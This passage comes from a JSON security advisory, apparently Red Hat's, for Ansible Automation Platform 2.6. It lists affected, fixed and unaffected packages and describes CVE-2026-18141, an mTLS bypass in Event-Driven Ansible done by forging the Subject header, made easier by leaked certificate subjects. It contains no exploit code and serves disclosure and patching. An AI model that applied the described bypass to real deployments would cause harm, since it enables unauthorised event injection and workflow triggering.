"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "eda-server: ExternalEventStreamViewSet trusts Subject header without validation and leaks expected DN"
},
{
"cve": "CVE-2026-18141",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"discovery_date": "2026-07-28T18:46:28.174000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2508155"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in aap-gateway, a component of Ansible Automation Platform\u0027s Event-Driven Ansible (EDA). An unauthenticated remote attacker can bypass mutual Transport Layer Security (mTLS) authentication for event streams. This is achieved by manipulating the event stream URL and forging the HTTP Subject header. The system also inadvertently discloses the expected certificate subject in error messages, which simplifies the attack. This vulnerability allows an attacker to inject arbitrary events into EDA, potentially triggering automated workflows.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aap-gateway: aap-gateway: Authentication bypass in Event-Driven Ansible via forged HTTP header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: Ansible Automation Platform 2.6 Event-Driven Ansible (EDA) is vulnerable to an authentication bypass, allowing unauthenticated remote attackers to inject arbitrary events into mTLS-protected event streams. This is due to a flaw in the `aap-gateway` configuration that permits bypassing mTLS by manipulating the URL and forging the Subject HTTP header. The vulnerability is exacerbated by information disclosure, where error messages reveal the expected certificate subject, simplifying targeted exploitation against default mTLS deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
